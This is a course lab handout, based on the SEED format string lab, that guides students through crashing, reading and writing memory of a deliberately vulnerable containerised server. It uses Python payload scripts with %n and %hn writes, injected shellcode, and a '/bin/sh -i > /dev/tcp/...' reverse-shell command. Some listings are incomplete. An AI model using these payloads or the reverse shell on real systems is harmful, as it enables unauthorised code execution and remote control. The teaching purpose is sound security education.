Lab-4_Format_String_Attack_Lab
Department of CSE 1
Format String
Information Security | Jan 2024
Overview
The printf() function in C prints a string according to a format. Its first argument,
called the format string, defines how the output should be formatted. Format strings use
placeholders marked by the % character, which the printf() function fills in with data during
printing. Format strings are not limited to the printf() function; many other
functions, such as sprintf(), fprintf(), and scanf(), also use them. Some programs allow
users to provide all or part of the contents of a format string. If such contents are not
sanitized, malicious users can use this opportunity to get the program to run arbitrary code.
A problem like this is called a format string vulnerability.
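To make the risk concrete, here is a toy model written in Python. It is only a sketch of the idea, not how the C library is implemented: the stack is treated as a list of words, and each %x simply consumes the next word. The names toy_printf and stack, and the sample values, are made up for illustration.

```python
import re

def toy_printf(fmt, stack):
    """Toy model of printf(): each %x prints the next word found on the stack.

    The real printf() cannot tell how many arguments the caller passed;
    it trusts the format string and keeps reading.
    """
    words = iter(stack)
    return re.sub(r"%x", lambda match: format(next(words), "x"), fmt)

# Hypothetical stack contents: one intended argument followed by unrelated data.
stack = [0x2A, 0xDEADBEEF, 0x08049000]

intended = toy_printf("value=%x", stack)   # programmer-supplied format string
leaked = toy_printf("%x.%x.%x", stack)     # user-supplied format string
print(intended)
print(leaked)
```

With a user-controlled format string, the extra %x specifiers print words that were never meant to be shown.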
The objective of this lab is for students to gain first-hand experience with format string
vulnerabilities by putting what they have learned about the vulnerability in class into
action. Students will be given a program with a format string vulnerability; their task is to
exploit the vulnerability to achieve the following damage: (1) crash the program, (2) read the
internal memory of the program, (3) modify the internal memory of the program, and most
severely, (4) inject and execute malicious code using the victim program’s privilege.
This lab covers the following topics:
• Format string vulnerability, and code injection
• Stack layout
• Shellcode
• Reverse shell
This lab has been tested within the SEED Labs 20.04 VM. You are to download the
Labsetup.zip file within this VM and perform the tasks here. The Labsetup.zip file can be
found at https://seedsecuritylabs.org/Labs_20.04/Software/Format_String/.
Environment Setup
Turning Off the Countermeasure
Modern operating systems use address space randomization to randomize the starting
address of heap and stack. This makes guessing the exact addresses difficult; guessing
addresses is one of the critical steps of the format-string attack. To simplify the tasks in this
lab, we turn off the address randomization.
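On Linux, the current address-randomization mode can be inspected through /proc/sys/kernel/randomize_va_space. The short Python sketch below only reads and interprets that value; it does not change it. The helper name describe_aslr is an assumption made for this example.

```python
from pathlib import Path

# Linux exposes the address-randomization mode through this file.
ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and VDSO randomized",
    2: "full randomization (heap included)",
}

def describe_aslr(raw):
    """Translate the raw file content (for example '2\\n') into a description."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, "unknown mode %d" % value)

# Only attempt the read where the file exists (i.e. on Linux).
if ASLR_PATH.exists():
    print(describe_aslr(ASLR_PATH.read_text()))
```

For this lab the expected result is "disabled" once the countermeasure has been turned off.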
1. Run the command below in a terminal window. The docker commands covered in the
subsequent steps must be run in that same terminal window:
The above program reads data from the standard input, and then passes the data to
myprintf(), which calls printf() to print out the data. The way the input data is fed into
the printf() function is unsafe, and it leads to a format-string vulnerability. We will exploit this
vulnerability.
The program will run on a server with the root privilege, and its standard input will be
redirected to a TCP connection between the server and a remote user. Therefore, the program
actually gets its data from a remote user. If users can exploit this vulnerability, they can cause
damage.
Compilation. We will compile the format program into both 32-bit and 64-bit binaries. Our
pre-built Ubuntu 20.04 VM is a 64-bit VM, but it still supports 32-bit binaries. All we need to
do is to use the -m32 option in the gcc command. For 32-bit compilation, we also use -static
to generate a statically-linked binary, which is self-contained and does not depend on any
dynamic library, because the 32-bit dynamic libraries are not installed in our containers.
2. Navigate to the server-code directory and compile the “server.c” program using
make.
Commands:
$ make
$ make install
During the compilation, you will see a warning message. This warning is generated by a
countermeasure implemented by the gcc compiler against format string vulnerabilities. We
can ignore this warning for now.
It should be noted that the program needs to be compiled using the "-z execstack"
option, which allows the stack to be executable. Our ultimate goal is to inject code into the
server program’s stack, and then trigger the code. Non-executable stack is a countermeasure
against stack-based code injection attacks, but it can be defeated using the return-to-libc
technique, which is covered by other SEED labs. In this lab, for simplicity, we disable this
defeat-able countermeasure.
The Server Program. In the server-code folder, you can find a program called server.c. This is
the main entry point of the server. It listens to port 9090. When it receives a TCP connection,
it invokes the format program, and sets the TCP connection as the standard input of the
format program. This way, when format reads data from stdin, it actually reads from the TCP
connection, i.e. the data are provided by the user on the TCP client side. It is not necessary
for students to read the source code of server.c.
We have added a little bit of randomness in the server program, so different students are
likely to see different values for the memory addresses and frame pointer. The values only
change when the container restarts, so as long as you keep the container running, you will
see the same numbers (the numbers seen by different students are still different). This
randomness is different from the address-randomization countermeasure. Its sole purpose is
to make students’ work a little bit different.
3. Before starting your containers, open the docker-compose.yml file and change the
value of the “container_name” field, under the “fmt-server-1” container, to your
SRN. This will print your SRN on the terminal along with the output from the server.
4. Move back into the main Labsetup directory and run the command:
$ docker-compose up
The terminal where we run the above command is where all server output will be printed.
1. Let’s first send a benign message to this server. We will see our message printed out by
the target container.
Command:
$ echo hello | nc 10.9.0.5 9090
Ctrl + c
You need to press CTRL + c after entering your command for the server to respond.
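The same message can also be sent from Python instead of nc. The sketch below is an assumption-laden alternative, not part of the lab setup: send_payload is a hypothetical helper, and it is assumed that closing the socket gives the server the end-of-input that Ctrl + c provides when using nc.

```python
import socket

def send_payload(host, port, data, timeout=5.0):
    """Open a TCP connection, send all of data, then close the connection.

    Closing the socket signals end-of-input to the peer. Returns the number
    of bytes sent.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(data)
    return len(data)

# Example call for this lab's server (not executed here):
#   send_payload("10.9.0.5", 9090, b"hello\n")
```

The server's reaction still has to be read in the terminal where the containers are running, because the output is printed there rather than returned to the client.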
Your task is to provide an input to the server, such that when the server program tries to
print out the user input in the myprintf() function, it will crash. You can tell whether the
format program has crashed or not by looking at the container’s printout. If myprintf()
returns, it will print out "Returned properly" and a few smiley faces. If you don’t see them,
the format program has probably crashed. However, the server program will not crash; the
crashed format program runs in a child process spawned by the server program.
Since most of the format strings constructed in this lab can be quite long, it is better to use a
program to do that.
build_string-T1.py
#!/usr/bin/python3
import sys
s = "%s"*30
print(s)
2. Make the build_string-T1 file executable, run it and pipe the output of the program to our
server at the IP address 10.9.0.5.
Commands:
$ chmod u+x build_string-T1.py
$ ./build_string-T1.py | nc 10.9.0.5 9090
CTRL + C
Take appropriate screenshots and report your observations with appropriate explanations.
Note: The hexadecimal ASCII value of “@” is 0x40, so as you look through the output displayed by the
server program, look for the sequence “40404040” in the stack data printed out. If you do
not see it, adjust the value of 64 in the code until the first four bytes of your input are
displayed, i.e. until the value “40404040” appears.
This value is the distance to the buffer variable, i.e. the input buffer (as named in the server’s
output) that is declared in the main function of the format.c program.
build_string-T2A.py
#!/usr/bin/python3
import sys
s = "@@@@"+"%x"*64 # Change this if necessary
print(s)
1. Make the “build_string-T2A” file executable, run it and pipe the output of the
program to our server at the IP address 10.9.0.5.
Commands:
$ chmod u+x build_string-T2A.py
$ ./build_string-T2A.py | nc 10.9.0.5 9090
CTRL + C
Take appropriate screenshots and report your observations with appropriate explanations.
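Counting words by eye in the server's output is error-prone. The following sketch shows one way to locate the marker automatically. It assumes the format string uses "%.8x" instead of "%x", so that every stack word is printed as exactly eight hex digits, and that dump holds only the hex digits printed after the leading "@@@@". The function name marker_distance and the sample words are hypothetical.

```python
def marker_distance(dump, marker="40404040", width=8):
    """Return the 1-based position of marker among fixed-width hex words.

    Returns None when the marker is not present, which means more
    specifiers are needed in the format string.
    """
    words = [dump[i:i + width] for i in range(0, len(dump), width)]
    if marker not in words:
        return None
    return words.index(marker) + 1

# Hypothetical dump made of three stack words; the third one is "@@@@".
sample_words = [0x11223344, 0x1000, 0x40404040]
dump = "".join("%.8x" % word for word in sample_words)

print(marker_distance(dump))
```

The returned position is the number of specifiers needed to reach the first four bytes of the input.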
number = 0xAABBCCDD
content[0:4] = (number).to_bytes(4,byteorder='little')
1. In the code, replace only the value of the number variable with the address of the secret
message, which is displayed on the terminal where the “docker-compose up”
command was run. It will look like the following:
2. Also replace the value “63” in the format string of this program with the
value found in Task 2A minus one.
build_string-T2B.py
#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
fmt = (s).encode('latin-1')
content[8:8+len(fmt)] = fmt
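The listing above does not show how the format string s is defined. The sketch below is one plausible way to assemble the whole payload, under stated assumptions: the address goes in bytes 0-3, bytes 4-7 hold non-zero filler (a zero byte would end the format string early), and the format string skips distance - 1 words with "%.8x" before a final "%s" dereferences the address. The function name build_read_payload, the filler, and the sample address are all hypothetical.

```python
N = 1500

def build_read_payload(address, distance):
    """Build an N-byte payload that makes %s read the string at address.

    distance is the value found in Task 2A (position of the input buffer).
    """
    content = bytearray(0x0 for i in range(N))
    content[0:4] = address.to_bytes(4, byteorder='little')
    content[4:8] = b"@@@@"                       # assumed non-zero filler
    s = "%.8x" * (distance - 1) + "%s"           # assumed format string
    fmt = s.encode('latin-1')
    content[8:8 + len(fmt)] = fmt
    return bytes(content)

# Hypothetical values; use the address printed by your own server.
payload = build_read_payload(0x080B4008, 64)
print(len(payload))
```

Writing the returned bytes to badfile in binary mode ('wb') produces the file that is later piped to nc.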
1. Create a file called “badfile” to store the exploits we will create and then generate the
exploit code. Then send the contents of the badfile to the vulnerable server.
$ touch badfile
$ chmod u+x build_string-T2B.py
$ ./build_string-T2B.py
$ cat badfile | nc 10.9.0.5 9090
Take appropriate screenshots and report your observations with appropriate explanations.
1. In the code replace only the number variable with the value of the target variable’s
address.
2. Replace the value “63” in this program with the value found in Task 2A
minus one.
build_string-T3A.py
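#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
# Address of the target variable (replace with the value shown by the server)
number = 0xffffffff
content[0:4] = (number).to_bytes(4,byteorder='little')
# Skip 63 stack words, then write the character count to the address above
s = "%.8x"*63 + "%n"
fmt = (s).encode('latin-1')
content[4:4+len(fmt)] = fmt
# Save the payload to badfile, which is sent to the server in the next step
with open('badfile', 'wb') as f:
    f.write(content)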
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make “build_string-T3A.py” executable and run it to generate the exploit code. Then
send the contents of the badfile to the vulnerable server.
Commands:
$ chmod u+x build_string-T3A.py
$ ./build_string-T3A.py
$ cat badfile | nc 10.9.0.5 9090
The value written to the target variable is equal to the number of characters printed out
before the %n format specifier: 4 (the 4 characters printed for the address value, i.e. the
number variable) + 8 * 63 (8 characters for each of the 63 %.8x format specifiers) = 508,
which is 0x1fc in hexadecimal.
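The count can be checked with a few lines of Python. The sketch below relies on the fact that "%.8x" pads every word to at least eight hex digits, so the printed width does not depend on the stack contents; the sample words are made up.

```python
ADDRESS_BYTES = 4        # the address stored at content[0:4]

# Hypothetical stack words; only their printed width matters here.
sample_words = [0x0, 0x11223344, 0xFF] * 21          # 63 words in total
printed = "".join("%.8x" % word for word in sample_words)

# Characters printed before %n: the address bytes plus 63 padded words.
count = ADDRESS_BYTES + len(printed)
print(count, hex(count))
```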
Take appropriate screenshots and report your observations with appropriate explanations.
1. In the code replace the number variable with the value of the target variable’s
address.
2. Replace the value “62” in the program with the value found in Task 2A
minus two.
build_string-T3B.py
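#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
# Address of the target variable (replace with the value shown by the server)
number = 0xffffffff
content[0:4] = (number).to_bytes(4,byteorder='little')
# 62 padded words, then one long padded word so that %n stores 0x5000
s = "%.8x"*62 + "%.19980x%n"
fmt = (s).encode('latin-1')
content[4:4+len(fmt)] = fmt
# Save the payload to badfile, which is sent to the server in the next step
with open('badfile', 'wb') as f:
    f.write(content)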
The format string will differ if your distance to the buffer variable changes (63 in the case of
all given lab code).
0x5000 in decimal is equal to 20480. Now we can calculate the precision of the
final %x format specifier so that we can overwrite the data of the target variable as follows:
20480 (decimal value of 0x5000) - 4 (bytes of the target variable’s address) - 8*62 (8 characters
for each of the 62 %.8x specifiers) = 19980
Which is the value as seen in the code above at the following line:
s = "%.8x"*62 + "%.19980x%n"
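The same arithmetic can be wrapped in a small helper so that it is easy to redo when the distance changes. This is a sketch only; the function name precision_for and its parameters are hypothetical.

```python
def precision_for(target_value, prefix_bytes, skipped_specifiers, width=8):
    """Precision of the final %x so that %n stores exactly target_value.

    prefix_bytes: raw bytes printed before the format string (the address).
    skipped_specifiers: number of %.8x specifiers before the final %x.
    """
    precision = target_value - prefix_bytes - width * skipped_specifiers
    if precision < width:
        # A smaller precision cannot be relied on: %x may print up to 8 digits.
        raise ValueError("target value too small for this layout")
    return precision

precision = precision_for(0x5000, 4, 62)
s = "%.8x" * 62 + f"%.{precision}x%n"
print(precision)
```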
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make “build_string-T3B.py” executable and run it to generate the exploit code. Then
send the contents of the badfile to the vulnerable server.
Commands:
$ chmod u+x build_string-T3B.py
$ ./build_string-T3B.py
$ cat badfile | nc 10.9.0.5 9090
Take appropriate screenshots and report your observations with appropriate explanations.
1. Replace the number1 variable with the value of the target variable’s address +2 and
replace number2 with just the value of the target variable’s address.
2. Replace the value “62” in the program with the value found in Task 2A
minus two.
build_string-T3C.py
#!/usr/bin/python3
import sys
N = 1500
content = bytearray(0x0 for i in range(N))
fmt = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt
The values written to the variables corresponding to %n are cumulative, i.e., if the first %n
gets a value x, and before the second %n, another t characters are printed, the second %n will
get the value x+t. Therefore, let us overwrite the bytes at the first address with 0xaabb first, and
then print out some more characters, so that when we reach the second address, the number of
characters printed out has increased to 0xccdd.
The format string will differ if your distance to the buffer variable changes (63 in the case of
all given lab code).
0xaabb in decimal is equal to 43707. Now we can calculate the precision of the
first %x format specifier so that we can overwrite the data of the target variable:
Since the values accumulate, we take the difference between the two halves of the value being
written (0xccdd - 0xaabb), and that becomes the precision of the second format specifier.
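The two precisions can be worked out as follows. This is a sketch under assumptions inferred from the partial listing: 12 bytes precede the format string (the address + 2, four filler bytes, then the address), 62 "%.8x" specifiers are skipped first, and each write uses %hn, which stores only two bytes.

```python
PREFIX_BYTES = 12     # assumed: address+2, 4 filler bytes, address
SKIPPED = 62          # value from Task 2A minus two (62 in the lab code)
WIDTH = 8             # characters printed by each %.8x

# First %hn must see 0xaabb characters printed so far.
first = 0xAABB - PREFIX_BYTES - WIDTH * SKIPPED
# Second %hn must see 0xccdd; only the difference still has to be printed.
second = 0xCCDD - 0xAABB

s = "%.8x" * SKIPPED + f"%.{first}x%hn" + f"%.{second}x%hn"
print(first, second)
```

The second padded %x also consumes the four filler bytes as its argument, which is why the second address sits at offset 8 rather than offset 4.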
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make “build_string-T3C.py” executable and run it to generate the exploit code. Then
send the contents of the badfile to the vulnerable server.
Commands:
$ chmod u+x build_string-T3C.py
$ ./build_string-T3C.py
$ cat badfile | nc 10.9.0.5 9090
Take appropriate screenshots and report your observations with appropriate explanations.
To succeed in this task, it is essential to understand the stack layout when the printf() function
is invoked inside myprintf(). Figure 1 depicts the stack layout. It should be noted that we
intentionally placed a dummy stack frame between the main and myprintf functions, but it is
not shown in the figure. Before working on this task, students need to answer the following
questions (please include your answers in the lab report):
● Question 1: What are the memory addresses at the locations marked by 2 and 3?
● Question 2: How many %x format specifiers do we need to move the format string
argument pointer to 3? Remember, the argument pointer starts from the location
above 1.
Figure: Stack layout when printf() is invoked from inside of the myprintf() function.
Shellcode
Shellcode is typically used in code injection attacks. It is basically a piece of code that launches
a shell, and is usually written in assembly language. In this lab, we only provide the binary
version of a generic shellcode, without explaining how it works, because it is non-trivial. If you
are interested in how exactly shellcode works, and want to write a shellcode from scratch,
you can learn that from a separate SEED lab called Shellcode Lab. Our generic shellcode is
listed in the following (we only list the 32-bit version):
The shellcode runs the "/bin/bash" shell program (Line 1), but it is given two arguments, "-c"
(Line 2) and a command string (Line 3). This indicates that the shell program will run the
commands in the second argument. The * at the end of these strings is only a placeholder,
and it will be replaced by one byte of 0x00 during the execution of the shellcode. Each string
needs to have a zero at the end, but we cannot put zeros in the shellcode. Instead, we put a
placeholder at the end of each string, and then dynamically put a zero in the placeholder
during the execution.
If we want the shellcode to run some other commands, we just need to modify the command
string in Line 3. However, when making changes, we need to make sure not to change the
length of this string, because the starting position of the placeholder for the argv[] array,
which is right after the command string, is hardcoded in the binary portion of the shellcode.
If we change the length, we need to modify the binary part.
To keep the star (*) at the end of this string at the same position, you can add or delete spaces.
Both 32-bit and 64-bit versions of shellcode are included in the exploit.py inside the attack-
code folder.
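Padding by hand is easy to get wrong, so a helper can do it. The sketch below pads a command with spaces and appends the star so that the total length stays fixed. The name fit_command and the length of 60 are hypothetical; use the length of the command string found in your own exploit.py.

```python
def fit_command(command, total_length):
    """Pad command with spaces and append '*' so the result has total_length chars."""
    if len(command) + 1 > total_length:
        raise ValueError("command too long for the fixed-size slot")
    return command.ljust(total_length - 1) + "*"

# Hypothetical slot length of 60 characters.
fitted = fit_command("/bin/ls -l; echo Hello", 60)
print(repr(fitted))
```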
Please construct your input, feed it to the server program, and demonstrate that you can
successfully get the server to run your shellcode.
1. Replace the value of the number variable in the code with the address value of the
“frame pointer”. This is displayed on the server every time an input is given.
We will be writing the address of the input buffer to memory and we have to create the format
string for it.
The format string values will differ if the distance to the buffer variable (Found in Task 2A)
changes.
0xffff in decimal is equal to 65535. Now we can calculate the value of the precision of the first
%x format specifier so that we can overwrite the data of the target variable:
We know from the previous task that the value accumulates when using %hn to write to memory,
but what do we do if the value has already reached 0xffff? We utilize the concept of wrap
around. We add 1 to 0xffff so that we end up at 0x0000, following which we just add the
decimal value for the second half of the address. We also add 0x168 to the buffer address so
that we jump to a NOP that is present inside our payload inside the buffer variable.
This value becomes the precision of the format specifier that writes the second half of the input
buffer’s address.
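The wrap-around calculation can be sketched in Python. The helper hn_paddings is hypothetical, as are the sample buffer address and the assumption that 12 prefix bytes and 62 "%.8x" specifiers have been printed before the first padded %x. Because %hn stores only the low 16 bits of the character count, every padding is computed modulo 0x10000.

```python
def hn_paddings(halves, already_printed, min_width=8):
    """Return the %x precisions needed before each successive %hn write.

    halves: 16-bit values to store, in the order the %hn specifiers appear.
    already_printed: characters printed before the first padded %x.
    """
    paddings = []
    count = already_printed
    for half in halves:
        pad = (half - count) % 0x10000      # wrap around past 0xffff
        if pad < min_width:
            pad += 0x10000                  # %x may print up to 8 digits anyway
        paddings.append(pad)
        count += pad
    return paddings

BUFFER_ADDR = 0xFFFFD5C0                    # hypothetical input buffer address
target = BUFFER_ADDR + 0x168                # land on a NOP inside the payload
high, low = target >> 16, target & 0xFFFF

first, second = hn_paddings([high, low], 12 + 8 * 62)
print(first, second)
```

Here the second padding equals the low half plus one, matching the "add 1 to 0xffff, then add the second half" reasoning above.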
exploit.py
#!/usr/bin/python3
import sys
N = 1500
# Fill the content with NOPs
content = bytearray(0x90 for i in range(N))
###########################################################
# Replace 0xffffffff in both lines with the frame pointer value printed by
# the server; the placeholder as written does not fit in 4 bytes.
number = 0xffffffff+6
content[0:4] = (number).to_bytes(4,byteorder='little')
number = 0xffffffff +4
content[8:12] = (number).to_bytes(4,byteorder='little')
content[12:12+len(fmt)] = fmt
##########################################################
1. Delete and recreate the badfile that will store the exploit code.
Commands:
$ rm badfile
$ touch badfile
2. Make “exploit.py” executable and run it to generate the exploit code. Then send the
contents of the badfile to the vulnerable server.
Commands:
Take appropriate screenshots and report your observations with appropriate explanations.
The format string and the values for the number variables remain the same as in the previous
task. The original code looks like the following:
1. Replace the above line with the following and replace the IP address with the address
of your VM.
" pwd; /bin/sh -i > /dev/tcp/[IP address enp0s3]/7070 0<&1 2>&1 ; *"
2. Go back to your previous terminal window and delete and recreate the badfile that will
store the exploit code.
Commands:
$ rm badfile
$ touch badfile
3. Make “exploit.py” executable and run it to generate the exploit code. Then send the
contents of the badfile to the vulnerable server.
Commands:
$ ./exploit.py
$ cat badfile | nc 10.9.0.5 9090
4. You should observe that you get a reverse connection back in the terminal where you are
running the netcat listener. Here, run the following commands before exiting out of the
connection:
Commands:
# whoami
# ifconfig
# exit
Take appropriate screenshots and report your observations with appropriate explanations.
Remember the warning message generated by the gcc compiler? Please explain what it
means. We will attempt to fix the vulnerability and see if our attacks are successful.
1. Stop the containers and remove the existing format-32 and format-64 files from both the
server-code directory and fmt-containers directory.
2. In the “format.c” file change the vulnerable “printf()” function to the following to fix the
vulnerability.
3. Rebuild your containers using the “--no-cache” flag and start your containers again.
Commands:
$ docker-compose build --no-cache
$ docker-compose up